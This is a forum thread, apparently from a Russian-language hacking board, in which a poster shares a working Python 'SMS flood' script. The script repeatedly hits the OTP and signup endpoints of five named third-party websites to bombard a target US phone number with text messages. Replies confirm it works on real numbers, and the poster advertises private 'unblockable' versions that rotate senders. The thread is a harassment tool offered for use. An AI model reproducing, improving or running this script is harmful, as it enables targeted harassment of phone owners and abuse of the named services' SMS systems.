Python to flood sms numbers. made fresh by me.
feedback is appreciated.
pastebin.com/9CypYaer
password: FixrrVUar8
feedback is appreciated.
pastebin.com/9CypYaer
password: FixrrVUar8
Последнее редактирование:
Python to flood sms numbers. made fresh by me.
feedback is appreciated.
pastebin.com/9CypYaer
password: FixrrVUar8

import requests
import random
COUNT = 20
PHONE_NUMBER = "9012905492"
def flood_number():
amnet = requests.get(f"https://authorservices.amnet-systems.com/otp_generate/signup/+1{PHONE_NUMBER}")
print(f"> Amnet: {amnet.status_code}")
author_services = requests.get(f"https://authorservices.amnet-systems.com/otp_generate/signup/+1{PHONE_NUMBER}")
print(f"> Authorservices: {author_services.status_code}")
docidit_data = {
"ci_csrf_token":"",
"loginPhone":PHONE_NUMBER,
"userPhoneCode":"1",
"userPhoneCountryCode":"us",
"loginWithOTP":"0",
"loginPassword":"Flood123",
"forgotPass":"0"
}
docidit = requests.post("https://docdit.com/home/do_login", data=docidit_data)
print(f"> Docidit: {docidit.status_code}")
ridetopray = requests.get(f"https://ridetopray.com/ajax_rider_registration.php?act=check_valid_phone&id={PHONE_NUMBER}&code=1&set_otp=5293")
print(f"> Ridetopray: {ridetopray.status_code}")
pliris_data = {
"mobileno":PHONE_NUMBER,
"country_code":"1",
"otpcount":"1"
}
pliris = requests.post("https://www.pliriscaremx.com/Signin/sendotp", data=pliris_data)
print(f"> Pliris: {pliris.status_code}")
if __name__ == "__main__":
for _ in range(COUNT):
flood_number()
Протестил,работает...только всё с одного номера идёт....расширить быРаботает?![]()
I have private python scripts that will come from a different number every single request (unblockable).Протестил,работает...только всё с одного номера идёт....расширить бы
Script works on any US phone number. I gave you an example number in the script. Floods example and real numbers.Для работы нужен реальный номер или можно использовать сгенерированные?